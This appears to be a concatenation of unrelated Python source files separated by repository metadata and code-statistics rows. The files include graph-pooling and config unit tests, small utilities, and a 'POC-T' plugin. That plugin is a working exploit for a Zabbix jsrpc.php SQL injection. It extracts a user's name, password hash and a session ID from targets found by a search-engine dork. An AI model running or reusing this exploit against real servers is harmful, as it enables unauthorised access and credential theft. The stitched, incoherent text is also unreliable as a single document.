old_dual_node_to_new_one = pooling_log.old_dual_node_to_new_one
self.assertEqual(len(old_dual_node_to_new_one), num_dual_nodes)
old_dual_nodes_index_with_corresponding_new_one = [
petdni_batch[primal_edge]
for primal_edge in [(0, 1), (0, 7), (0, 10), (1, 2), (2, 9), (3, 4),
(3, 8), (4, 5), (5, 6), (6, 12), (7, 11),
(8, 13), (9, 10), (11, 12), (12, 13)]
] + [
petdni_batch[primal_edge[::-1]]
for primal_edge in [(0, 1), (0, 7), (0, 10), (1, 2), (2, 9), (3, 4),
(3, 8), (4, 5), (5, 6), (6, 12), (7, 11),
(8, 13), (9, 10), (11, 12), (12, 13)]
]
corresponding_new_dual_nodes = [
new_petdni_batch[primal_edge]
for primal_edge in [(0, 1), (0, 4), (0, 6), (1, 2), (2, 5), (2, 3),
(2, 5), (3, 1), (1, 4), (4, 7), (4, 6), (5, 3),
(5, 6), (6, 7), (7, 3)]
] + [
new_petdni_batch[primal_edge[::-1]]
for primal_edge in [(0, 1), (0, 4), (0, 6), (1, 2), (2, 5), (2, 3),
(2, 5), (3, 1), (1, 4), (4, 7), (4, 6), (5, 3),
(5, 6), (6, 7), (7, 3)]
]
for dual_node_idx in range(num_dual_nodes):
if (dual_node_idx in old_dual_nodes_index_with_corresponding_new_one
):
# - The old dual node has a corresponding new dual node.
self.assertEqual(
old_dual_node_to_new_one[dual_node_idx],
corresponding_new_dual_nodes[
old_dual_nodes_index_with_corresponding_new_one.index(
dual_node_idx)])
else:
# - The old dual node has no corresponding new dual node.
self.assertEqual(old_dual_node_to_new_one[dual_node_idx], -1)
# - Check the edges between the new dual nodes, which should be the
# following (with dual nodes indicated by the corresponding primal
# nodes as a set), plus the self-loops:
# - (0->1) -> (1->2);
# - (0->1) -> (1->3);
# - (0->1) -> (1->4);
# - (1->0) -> (0->4);
# - (1->0) -> (0->6);
# - (0->4) -> (4->1);
# - (0->4) -> (4->6);
# - (0->4) -> (4->7);
# - (4->0) -> (0->1);
# - (4->0) -> (0->6);
# - (0->6) -> (6->4);
# - (0->6) -> (6->5);
# - (0->6) -> (6->7);
# - (6->0) -> (0->1);
# - (6->0) -> (0->4);
# - (1->2) -> (2->3);
# - (1->2) -> (2->5);
# - (2->1) -> (1->0);
# - (2->1) -> (1->3);
# - (2->1) -> (1->4);
# - (1->3) -> (3->2);
# - (1->3) -> (3->5);
# - (1->3) -> (3->7);
# - (3->1) -> (1->0);
# - (3->1) -> (1->2);
# - (3->1) -> (1->4);
# - (1->4) -> (4->0);
# - (1->4) -> (4->6);
# - (1->4) -> (4->7);
# - (4->1) -> (1->0);
# - (4->1) -> (1->2);
# - (4->1) -> (1->3);
# - (2->3) -> (3->1);
# - (2->3) -> (3->5);
# - (2->3) -> (3->7);
# - (3->2) -> (2->1);
# - (3->2) -> (2->5);
# - (2->5) -> (5->3);
# - (2->5) -> (5->6);
# - (5->2) -> (2->1);
# - (5->2) -> (2->3);
# - (3->5) -> (5->2);
# - (3->5) -> (5->6);
# - (5->3) -> (3->1);
# - (5->3) -> (3->2);
# - (5->3) -> (3->7);
# - (3->7) -> (7->4);
# - (3->7) -> (7->6);
# - (7->3) -> (3->1);
# - (7->3) -> (3->2);
# - (7->3) -> (3->5);
# - (4->6) -> (6->0);
# - (4->6) -> (6->5);
# - (4->6) -> (6->7);
# - (6->4) -> (4->0);
# - (6->4) -> (4->1);
# - (6->4) -> (4->7);
# - (4->7) -> (7->3);
# - (4->7) -> (7->6);
# - (7->4) -> (4->0);
# - (7->4) -> (4->1);
# - (7->4) -> (4->6);
# - (5->6) -> (6->0);
# - (5->6) -> (6->4);
# - (5->6) -> (6->7);
# - (6->5) -> (5->2);
# - (6->5) -> (5->3);
# - (6->7) -> (7->3);
# - (6->7) -> (7->4);
# - (7->6) -> (6->0);
# - (7->6) -> (6->4);
# - (7->6) -> (6->5).
self.assertEqual(num_new_dual_edges, 72 + num_new_dual_nodes)
new_dual_edge_index_list = new_dual_graph_batch.edge_index.t().tolist()
dual_node_to_neighbors = {
(0, 1): [(1, 2), (1, 3), (1, 4)],
(1, 0): [(0, 4), (0, 6)],
(0, 4): [(4, 1), (4, 6), (4, 7)],
(4, 0): [(0, 1), (0, 6)],
(0, 6): [(6, 4), (6, 5), (6, 7)],
(6, 0): [(0, 1), (0, 4)],
(1, 2): [(2, 3), (2, 5)],
(2, 1): [(1, 0), (1, 3), (1, 4)],
(1, 3): [(3, 2), (3, 5), (3, 7)],
(3, 1): [(1, 0), (1, 2), (1, 4)],
(1, 4): [(4, 0), (4, 6), (4, 7)],
(4, 1): [(1, 0), (1, 2), (1, 3)],
(2, 3): [(3, 1), (3, 5), (3, 7)],
(3, 2): [(2, 1), (2, 5)],
(2, 5): [(5, 3), (5, 6)],
(5, 2): [(2, 1), (2, 3)],
(3, 5): [(5, 2), (5, 6)],
(5, 3): [(3, 1), (3, 2), (3, 7)],
(3, 7): [(7, 4), (7, 6)],
(7, 3): [(3, 1), (3, 2), (3, 5)],
(4, 6): [(6, 0), (6, 5), (6, 7)],
(6, 4): [(4, 0), (4, 1), (4, 7)],
(4, 7): [(7, 3), (7, 6)],
(7, 4): [(4, 0), (4, 1), (4, 6)],
(5, 6): [(6, 0), (6, 4), (6, 7)],
(6, 5): [(5, 2), (5, 3)],
(6, 7): [(7, 3), (7, 4)],
(7, 6): [(6, 0), (6, 4), (6, 5)]
}
for new_dual_node, other_dual_nodes in dual_node_to_neighbors.items():
for other_dual_node in other_dual_nodes:
self.assertTrue([
new_petdni_batch[new_dual_node],
new_petdni_batch[other_dual_node]
] in new_dual_edge_index_list)
# Self-loop.
self.assertTrue([
new_petdni_batch[new_dual_node], new_petdni_batch[new_dual_node]
] in new_dual_edge_index_list)
| 49.650532
| 82
| 0.527222
| 23,952
| 177,451
| 3.586966
| 0.011398
| 0.066205
| 0.038131
| 0.022813
| 0.995717
| 0.994238
| 0.990491
| 0.990072
| 0.987301
| 0.987127
| 0
| 0.067688
| 0.341869
| 177,451
| 3,573
| 83
| 49.664428
| 0.667974
| 0.243425
| 0
| 0.945733
| 0
| 0
| 0.002346
| 0.002346
| 0
| 0
| 0
| 0
| 0.140074
| 1
| 0.007421
| false
| 0
| 0.003247
| 0
| 0.011132
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
514052c18b71dfee228e220003096bbb9a3c4488
| 3,229
|
py
|
Python
|
script/zabbix-jsrpc-mysql-exp.py
|
gaoming136692/POC-T
|
509d08cbaaced12bf9bc9aa9dd0748abc73a3c37
|
[
"DOC"
] | 6
|
2019-01-20T08:34:30.000Z
|
2021-09-14T15:47:42.000Z
|
script/zabbix-jsrpc-mysql-exp.py
|
gaoming136692/POC-T
|
509d08cbaaced12bf9bc9aa9dd0748abc73a3c37
|
[
"DOC"
] | null | null | null |
script/zabbix-jsrpc-mysql-exp.py
|
gaoming136692/POC-T
|
509d08cbaaced12bf9bc9aa9dd0748abc73a3c37
|
[
"DOC"
] | 4
|
2019-10-01T01:18:40.000Z
|
2021-10-01T12:02:20.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Author B0t0w1
"""
ZABBIX jsrpc.php SQL Inject Vulnerability (MySQL Exploit)
Usage:
python POC-T.py -T -m zabbix-jsrpc-mysql-exp --api --dork="zabbix country:us"
"""
import re
import urllib2
def poc(url):
url = url if '://' in url else 'http://' + url
if url[-1] != '/': url += '/'
passwd_sql = "(select 1 from(select count(*),concat((select (select (select concat(0x7e,(select concat(name,0x3a,passwd) from users limit 0,1),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)"
session_sql = "(select 1 from(select count(*),concat((select (select (select concat(0x7e,(select sessionid from sessions limit 0,1),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)"
payload_deteck = "jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get×tamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=999'&updateProfile=true&screenitemid=.=3600&stime=20160817050632&resourcetype=17&itemids%5B23297%5D=23297&action=showlatest&filter=&filter_task=&mark_color=1"
try:
response = urllib2.urlopen(url + payload_deteck, timeout=10).read()
except Exception, msg:
# print msg
pass
else:
key_reg = re.compile(r"INSERT\s*INTO\s*profiles")
Passwd = ""
Session_id = ""
if key_reg.findall(response):
payload_inject = url + "jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get×tamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=" + urllib2.quote(
passwd_sql) + "&updateProfile=true&screenitemid=.=3600&stime=20160817050632&resourcetype=17&itemids[23297]=23297&action=showlatest&filter=&filter_task=&mark_color=1"
try:
response = urllib2.urlopen(payload_inject, timeout=10).read()
except Exception, msg:
# print msg
pass
else:
result_reg = re.compile(r"Duplicate\s*entry\s*'~(.+?)~1")
results = result_reg.findall(response)
if results:
Passwd = "password_md5:" + results[0]
payload_inject = url + "jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get×tamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=" + urllib2.quote(
session_sql) + "&updateProfile=true&screenitemid=.=3600&stime=20160817050632&resourcetype=17&itemids[23297]=23297&action=showlatest&filter=&filter_task=&mark_color=1"
try:
response = urllib2.urlopen(payload_inject, timeout=10).read()
except Exception, msg:
# print msg
pass
else:
result_reg = re.compile(r"Duplicate\s*entry\s*'~(.+?)~1")
results = result_reg.findall(response)
if results:
Session_id = "Session_id:" + results[0]
return (url, Passwd, Session_id)
return False
| 53.816667
| 354
| 0.650046
| 406
| 3,229
| 5.093596
| 0.325123
| 0.015474
| 0.01354
| 0.052224
| 0.765474
| 0.765474
| 0.765474
| 0.765474
| 0.765474
| 0.730174
| 0
| 0.086153
| 0.212759
| 3,229
| 59
| 355
| 54.728814
| 0.72738
| 0.026634
| 0
| 0.536585
| 0
| 0.170732
| 0.525645
| 0.427422
| 0
| 0
| 0.006705
| 0
| 0
| 0
| null | null | 0.195122
| 0.04878
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
5aa3bce140b9893b85cafcabafd90f30757ea3b2
| 233
|
py
|
Python
|
serial/src/slice_test.py
|
Choi-Laboratory/SOBIT-Bringup
|
89a921ac5922b2963155d80739013c7ef4c67abf
|
[
"Apache-2.0"
] | null | null | null |
serial/src/slice_test.py
|
Choi-Laboratory/SOBIT-Bringup
|
89a921ac5922b2963155d80739013c7ef4c67abf
|
[
"Apache-2.0"
] | null | null | null |
serial/src/slice_test.py
|
Choi-Laboratory/SOBIT-Bringup
|
89a921ac5922b2963155d80739013c7ef4c67abf
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
str=";C8000;C8000;C8005;C0000;C7fcd;C7fce;C8009;C8097;C7ede;C7e56;C8002;C8004;C7fb6;;;;;;T8000;C7849;C776d;C8892;C776d;C9049;T8000;C87b6;C8892;C77ea;C8815;C6ff5\n"
print str
print str.split(";")
##追加しました
| 17.923077
| 163
| 0.733906
| 37
| 233
| 4.621622
| 0.810811
| 0.093567
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.37156
| 0.064378
| 233
| 12
| 164
| 19.416667
| 0.412844
| 0.111588
| 0
| 0
| 0
| 0.333333
| 0.78607
| 0.781095
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0.666667
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
5aaa049951156245605317fe17c8a221ca2086da
| 134
|
py
|
Python
|
plantman/utils.py
|
icynewyear/plant-man
|
5b54edbab99019aec80d5199b049d40123e54bf0
|
[
"MIT"
] | null | null | null |
plantman/utils.py
|
icynewyear/plant-man
|
5b54edbab99019aec80d5199b049d40123e54bf0
|
[
"MIT"
] | null | null | null |
plantman/utils.py
|
icynewyear/plant-man
|
5b54edbab99019aec80d5199b049d40123e54bf0
|
[
"MIT"
] | null | null | null |
import random
import string
def generate_uid(len: int = 12) -> str:
return "".join(random.choices(string.ascii_uppercase, k=len))
| 26.8
| 65
| 0.731343
| 20
| 134
| 4.8
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.017241
| 0.134328
| 134
| 5
| 65
| 26.8
| 0.810345
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0
| 0.5
| 0.25
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
5afcbfca536f5c836a4060d5eca41c4de5a63310
| 88
|
py
|
Python
|
GPSTracker/main/__init__.py
|
borisfoko/IoTLoRaWanFahradSchloss
|
cf5aa02f8d84218491d81faaf4dc6724a468faff
|
[
"MIT"
] | null | null | null |
GPSTracker/main/__init__.py
|
borisfoko/IoTLoRaWanFahradSchloss
|
cf5aa02f8d84218491d81faaf4dc6724a468faff
|
[
"MIT"
] | null | null | null |
GPSTracker/main/__init__.py
|
borisfoko/IoTLoRaWanFahradSchloss
|
cf5aa02f8d84218491d81faaf4dc6724a468faff
|
[
"MIT"
] | null | null | null |
from . import ttnClient
#ttnClient.mqtt_client.connect()
#ttnClient.mqtt_client.start()
| 22
| 32
| 0.806818
| 11
| 88
| 6.272727
| 0.636364
| 0.376812
| 0.550725
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.068182
| 88
| 4
| 33
| 22
| 0.841463
| 0.681818
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
8513b50716ea908b3907388bad727bcb16a0b6c7
| 24,831
|
py
|
Python
|
haychecker/_test/common/config_test.py
|
fruttasecca/hay_checker
|
2bbf4e8e90e0abc590dd74080fb6e4f445056354
|
[
"MIT"
] | 2
|
2019-05-22T08:24:38.000Z
|
2020-12-04T13:36:30.000Z
|
haychecker/_test/common/config_test.py
|
fruttasecca/hay_checker
|
2bbf4e8e90e0abc590dd74080fb6e4f445056354
|
[
"MIT"
] | null | null | null |
haychecker/_test/common/config_test.py
|
fruttasecca/hay_checker
|
2bbf4e8e90e0abc590dd74080fb6e4f445056354
|
[
"MIT"
] | 3
|
2018-09-15T13:40:40.000Z
|
2021-06-29T23:31:18.000Z
|
#!/usr/bin/python3
import unittest
from os.path import expanduser
from haychecker._common.config import Config
home = expanduser("~")
"""
Required arguments (table, inferSchema, output, metrics) have no default value, optional arguments
(delimiter, header, verbose) have default values (',', True, False).
"""
class TestConfig(unittest.TestCase):
def test_input_type(self):
with self.assertRaises(SystemExit) as cm:
Config(4)
def test_required_arguments(self):
# missing table
j1 = {
"inferSchema": True,
"delimiter": "|",
"header": True,
"output": home + "/output.json",
"verbose": True,
"metrics": [
{
"metric": "completeness"
},
]
}
# missing inferschema
j2 = {
"table": "tablePath",
"delimiter": "|",
"header": True,
"output": home + "/output.json",
"verbose": True,
"metrics": [
{
"metric": "completeness"
},
]
}
# missing output
j3 = {
"table": "tablePath",
"inferSchema": True,
"delimiter": "|",
"header": True,
"verbose": True,
"metrics": [
{
"metric": "completeness"
},
]
}
# missing metrics
j4 = {
"table": "tablePath",
"inferSchema": True,
"delimiter": "|",
"header": True,
"output": home + "/output.json",
"verbose": True,
}
with self.assertRaises(AssertionError) as cm:
Config(j1)
with self.assertRaises(AssertionError) as cm:
j1["table"] = 10
Config(j1)
with self.assertRaises(AssertionError) as cm:
Config(j2)
with self.assertRaises(AssertionError) as cm:
j2["inferSchema"] = "yes"
Config(j2)
with self.assertRaises(AssertionError) as cm:
Config(j3)
with self.assertRaises(AssertionError) as cm:
j3["output"] = True
Config(j3)
with self.assertRaises(AssertionError) as cm:
Config(j4)
with self.assertRaises(AssertionError) as cm:
j4["metrics"] = "ss"
Config(j4)
with self.assertRaises(AssertionError) as cm:
j4["metrics"] = []
Config(j4)
def test_optional_arguments1(self):
# no optional arguments
j5 = {
"table": "tablePath",
"inferSchema": True,
"output": home + "/output.json",
"metrics": [
{
"metric": "completeness"
},
]
}
# test default args are set as defaults
c = Config(j5)
self.assertEqual(c["delimiter"], ",")
self.assertEqual(c["header"], True)
self.assertEqual(c["verbose"], False)
def test_optional_arguments2(self):
# set optional arguments
j6 = {
"table": "tablePath",
"inferSchema": True,
"delimiter": "#",
"header": False,
"output": home + "/output.json",
"verbose": True,
"metrics": [
{
"metric": "completeness"
},
]
}
# test default args are set as we wanted
c = Config(j6)
self.assertEqual(c["delimiter"], "#")
self.assertEqual(c["header"], False)
self.assertEqual(c["verbose"], True)
with self.assertRaises(AssertionError) as cm:
j6["delimiter"] = True
Config(j6)
with self.assertRaises(AssertionError) as cm:
j6["delimiter"] = "#"
j6["header"] = "header"
Config(j6)
with self.assertRaises(AssertionError) as cm:
j6["header"] = False
j6["threads"] = "shouldnt be here"
Config(j6)
with self.assertRaises(AssertionError) as cm:
j6["verbose"] = 1
Config(j6)
def test_getter(self):
j7 = {
"table": "tablePath",
"inferSchema": True,
"delimiter": "#",
"header": False,
"output": home + "/output.json",
"verbose": True,
"metrics": [
{
"metric": "completeness"
},
]
}
c = Config(j7)
# test no assignment
with self.assertRaises(TypeError) as cm:
c["table"] = "new"
# test is copy
metrics = c["metrics"]
metrics[0]["metric"] = "ayy"
self.assertEqual(c["metrics"][0]["metric"], "completeness")
def test_completeness_check(self):
j8 = {
"table": "tablePath",
"inferSchema": True,
"delimiter": "#",
"header": False,
"output": home + "/output.json",
"verbose": False,
"metrics": [
{
"metric": "completeness",
"columns": []
},
]
}
with self.assertRaises(AssertionError) as cm:
Config(j8)
j8["metrics"][0]["metric"] = 10
del j8["metrics"][0]["columns"]
with self.assertRaises(AssertionError) as cm:
Config(j8)
j8["metrics"][0]["metric"] = "completeness"
j8["metrics"][0]["useless param"] = 1010
with self.assertRaises(AssertionError) as cm:
Config(j8)
j8["metrics"][0]["columns"] = ["c0"]
# note that at this point "useless param" is still in there
with self.assertRaises(AssertionError) as cm:
Config(j8)
del j8["metrics"][0]["useless param"]
# should run
Config(j8)
def test_deduplication_check(self):
j9 = {
"table": "tablePath",
"inferSchema": True,
"delimiter": "#",
"header": False,
"output": home + "/output.json",
"verbose": False,
"metrics": [
{
"metric": "deduplication",
"columns": []
},
]
}
with self.assertRaises(AssertionError) as cm:
Config(j9)
j9["metrics"][0]["metric"] = 10
del j9["metrics"][0]["columns"]
with self.assertRaises(AssertionError) as cm:
Config(j9)
j9["metrics"][0]["metric"] = "deduplication"
j9["metrics"][0]["useless param"] = 1010
with self.assertRaises(AssertionError) as cm:
Config(j9)
j9["metrics"][0]["columns"] = ["c0"]
# note that at this point "useless param" is still in there
with self.assertRaises(AssertionError) as cm:
Config(j9)
del j9["metrics"][0]["useless param"]
# should run
Config(j9)
def test_freshness_check(self):
j10 = {
"table": "tablePath",
"inferSchema": True,
"delimiter": "#",
"header": False,
"output": home + "/output.json",
"verbose": False,
"metrics": [
{
"metric": "freshness",
},
]
}
with self.assertRaises(AssertionError) as cm:
Config(j10)
j10["metrics"][0]["metric"] = 10
j10["metrics"][0]["columns"] = ["1"]
j10["metrics"][0]["timeFormat"] = "ss"
with self.assertRaises(AssertionError) as cm:
Config(j10)
j10["metrics"][0]["metric"] = "freshness"
j10["metrics"][0]["columns"] = []
with self.assertRaises(AssertionError) as cm:
Config(j10)
j10["metrics"][0]["metric"] = "freshness"
j10["metrics"][0]["columns"] = [list("true")]
j10["metrics"][0]["timeFormat"] = "ss"
with self.assertRaises(AssertionError) as cm:
Config(j10)
del j10["metrics"][0]["timeFormat"]
j10["metrics"][0]["metric"] = "freshness"
j10["metrics"][0]["columns"] = ["c2"]
j10["metrics"][0]["we"] = "ss"
with self.assertRaises(AssertionError) as cm:
Config(j10)
del j10["metrics"][0]["we"]
j10["metrics"][0]["metric"] = "freshness"
j10["metrics"][0]["columns"] = ["c2"]
j10["metrics"][0]["timeFormat"] = True
with self.assertRaises(AssertionError) as cm:
Config(j10)
del j10["metrics"][0]["timeFormat"]
j10["metrics"][0]["metric"] = "freshness"
j10["metrics"][0]["columns"] = ["c2"]
j10["metrics"][0]["dateFormat"] = list()
with self.assertRaises(AssertionError) as cm:
Config(j10)
j10["metrics"][0]["metric"] = "freshness"
j10["metrics"][0]["columns"] = [4.2]
j10["metrics"][0]["dateFormat"] = "ss:hh:mm"
with self.assertRaises(AssertionError) as cm:
Config(j10)
# should run
j10["metrics"][0]["columns"] = ["s"]
Config(j10)
def test_timeliness_check(self):
j11 = {
"table": "tablePath",
"inferSchema": True,
"delimiter": "#",
"header": False,
"output": home + "/output.json",
"verbose": False,
"metrics": [
{
"metric": "timeliness",
},
]
}
with self.assertRaises(AssertionError) as cm:
Config(j11)
j11["metrics"][0]["metric"] = 10
j11["metrics"][0]["columns"] = ["1"]
j11["metrics"][0]["timeFormat"] = "ss"
j11["metrics"][0]["value"] = "44"
with self.assertRaises(AssertionError) as cm:
Config(j11)
j11["metrics"][0]["metric"] = "timeliness"
j11["metrics"][0]["columns"] = []
with self.assertRaises(AssertionError) as cm:
Config(j11)
j11["metrics"][0]["columns"] = ["c4", "c2"]
j11["metrics"][0]["timeFormat"] = list()
with self.assertRaises(AssertionError) as cm:
Config(j11)
del j11["metrics"][0]["timeFormat"]
j11["metrics"][0]["dateFormat"] = list()
with self.assertRaises(AssertionError) as cm:
Config(j11)
j11["metrics"][0]["z<<"] = ["ss"]
del j11["metrics"][0]["dateFormat"]
with self.assertRaises(AssertionError) as cm:
Config(j11)
del j11["metrics"][0]["z<<"]
j11["metrics"][0]["value"] = 44
with self.assertRaises(AssertionError) as cm:
Config(j11)
j11["metrics"][0]["timeFormat"] = "ss:hh:mm"
with self.assertRaises(AssertionError) as cm:
Config(j11)
j11["metrics"][0]["timeFormat"] = ""
j11["metrics"][0]["value"] = ""
with self.assertRaises(AssertionError) as cm:
Config(j11)
j11["metrics"][0]["timeFormat"] = ":::"
j11["metrics"][0]["value"] = ":::"
with self.assertRaises(AssertionError) as cm:
Config(j11)
# should run
j11["metrics"][0]["timeFormat"] = "hhh"
j11["metrics"][0]["value"] = "555"
Config(j11)
def test_rule_check(self):
j12 = {
"table": "tablePath",
"inferSchema": True,
"delimiter": "#",
"header": False,
"output": home + "/output.json",
"verbose": False,
"metrics": [
{
"metric": "rule",
},
]
}
with self.assertRaises(AssertionError) as cm:
Config(j12)
j12["metrics"][0]["metric"] = 10
j12["metrics"][0]["conditions"] = dict()
with self.assertRaises(AssertionError) as cm:
Config(j12)
j12["metrics"][0]["metric"] = "rule"
j12["metrics"][0]["conditions"] = "aaa"
with self.assertRaises(AssertionError) as cm:
Config(j12)
j12["metrics"][0]["conditions"] = list()
with self.assertRaises(AssertionError) as cm:
Config(j12)
cond1 = dict()
cond2 = dict()
j12["metrics"][0]["conditions"] = [cond1, cond2]
with self.assertRaises(AssertionError) as cm:
Config(j12)
cond1 = {"s": 1, "z": 2, "x": 4}
cond2 = {"s": 1, "z": 2, "x": 4}
j12["metrics"][0]["conditions"] = [cond1, cond2]
with self.assertRaises(AssertionError) as cm:
Config(j12)
cond1 = {"column": None, "operator": "gt", "value": 4}
cond2 = {"column": 1, "operator": "gt", "value": 4}
j12["metrics"][0]["conditions"] = [cond1, cond2]
with self.assertRaises(AssertionError) as cm:
Config(j12)
cond1 = {"column": "we", "operator": "gt", "value": 4}
cond2 = {"column": "c1", "operator": "vgt", "value": 4}
j12["metrics"][0]["conditions"] = [cond1, cond2]
with self.assertRaises(AssertionError) as cm:
Config(j12)
cond1 = {"column": "we", "operator": "gt", "value": "s"}
cond2 = {"column": "c1", "operator": "gt", "value": 4}
j12["metrics"][0]["conditions"] = [cond1, cond2]
with self.assertRaises(AssertionError) as cm:
Config(j12)
cond1 = {"column": "we", "operator": "gt", "value": 4}
cond2 = {"column": "c1", "operator": "eq", "value": True}
j12["metrics"][0]["conditions"] = [cond1, cond2]
with self.assertRaises(AssertionError) as cm:
Config(j12)
cond1 = {"column": "we", "operator": "gt", "value": 4}
cond2 = {"column": "c1", "operator": "eq", "value": "jhon"}
j12["metrics"][0]["conditions"] = [cond1, cond2]
# should run
Config(j12)
def test_group_rule_check(self):
j13 = {
"table": "tablePath",
"inferSchema": True,
"delimiter": "#",
"header": False,
"output": home + "/output.json",
"verbose": False,
"metrics": [
{
"metric": "groupRule",
},
]
}
with self.assertRaises(AssertionError) as cm:
Config(j13)
j13["metrics"][0]["metric"] = "groupRule"
j13["metrics"][0]["having"] = dict()
with self.assertRaises(AssertionError) as cm:
Config(j13)
del j13["metrics"][0]["having"]
j13["metrics"][0]["columns"] = ["s"]
with self.assertRaises(AssertionError) as cm:
Config(j13)
j13["metrics"][0]["metric"] = "groupRule"
j13["metrics"][0]["columns"] = ["s"]
j13["metrics"][0]["having"] = ["s"]
j13["metrics"][0]["z"] = dict()
with self.assertRaises(AssertionError) as cm:
Config(j13)
del j13["metrics"][0]["z"]
j13["metrics"][0]["conditions"] = dict()
with self.assertRaises(AssertionError) as cm:
Config(j13)
cond1 = {"column": "we", "operator": "gt", "value": 4}
cond2 = {"column": "c1", "operator": "eq", "value": "jhon"}
having = {"operator": "zz", "value": 5, "aggregator": "min", "column": "c2"}
j13["metrics"][0]["having"] = [having]
j13["metrics"][0]["conditions"] = [cond1, cond2]
with self.assertRaises(AssertionError) as cm:
Config(j13)
having = {"operator": "gt", "value": 2, "aggregator": "dmin", "column": "c2"}
j13["metrics"][0]["having"] = [having]
with self.assertRaises(AssertionError) as cm:
Config(j13)
having = {"operator": "gt", "value": 2, "aggregator": "dmin", "column": "c2"}
j13["metrics"][0]["having"] = [having]
with self.assertRaises(AssertionError) as cm:
Config(j13)
having = {"operator": "gt", "value": 2, "aggregator": "max", "column": "c2"}
j13["metrics"][0]["having"] = [having]
cond2 = {"column": ["c11"], "operator": "eq", "value": "jhon"}
j13["metrics"][0]["conditions"] = [cond1, cond2]
with self.assertRaises(AssertionError) as cm:
Config(j13)
cond2 = {"column": "c11", "operator": "==", "value": "jhon"}
j13["metrics"][0]["conditions"] = [cond1, cond2]
with self.assertRaises(AssertionError) as cm:
Config(j13)
cond2 = {"column": "c11", "operator": "lt", "value": "0.01"}
j13["metrics"][0]["conditions"] = [cond1, cond2]
with self.assertRaises(AssertionError) as cm:
Config(j13)
cond2 = {"column": "c11", "operator": "eq", "value": 10}
j13["metrics"][0]["conditions"] = [cond1, cond2]
# should run
Config(j13)
def test_constraint_check(self):
j14 = {
"table": "tablePath",
"inferSchema": True,
"delimiter": "#",
"header": False,
"output": home + "/output.json",
"verbose": False,
"metrics": [
{
"metric": "constraint",
},
]
}
with self.assertRaises(AssertionError) as cm:
Config(j14)
j14["metrics"][0]["when"] = ["c2"]
with self.assertRaises(AssertionError) as cm:
Config(j14)
del j14["metrics"][0]["when"]
j14["metrics"][0]["then"] = ["c2"]
with self.assertRaises(AssertionError) as cm:
Config(j14)
j14["metrics"][0]["when"] = ["c2"]
j14["metrics"][0]["then"] = ["c2"]
j14["metrics"][0]["ssss"] = ["c2"]
with self.assertRaises(AssertionError) as cm:
Config(j14)
j14["metrics"][0]["when"] = "s2"
j14["metrics"][0]["then"] = ["c2"]
j14["metrics"][0]["ssss"] = ["c2"]
with self.assertRaises(AssertionError) as cm:
Config(j14)
del j14["metrics"][0]["ssss"]
j14["metrics"][0]["when"] = []
with self.assertRaises(AssertionError) as cm:
Config(j14)
j14["metrics"][0]["when"] = ["c1"]
j14["metrics"][0]["then"] = True
with self.assertRaises(AssertionError) as cm:
Config(j14)
j14["metrics"][0]["when"] = ["c1"]
j14["metrics"][0]["then"] = []
with self.assertRaises(AssertionError) as cm:
Config(j14)
j14["metrics"][0]["when"] = ["c1", None]
j14["metrics"][0]["then"] = []
with self.assertRaises(AssertionError) as cm:
Config(j14)
j14["metrics"][0]["when"] = ["c1", None]
j14["metrics"][0]["then"] = []
with self.assertRaises(AssertionError) as cm:
Config(j14)
j14["metrics"][0]["when"] = ["c1"]
j14["metrics"][0]["then"] = ["c2", "c1"]
with self.assertRaises(AssertionError) as cm:
Config(j14)
j14["metrics"][0]["when"] = ["c1"]
j14["metrics"][0]["then"] = ["c2", "c4"]
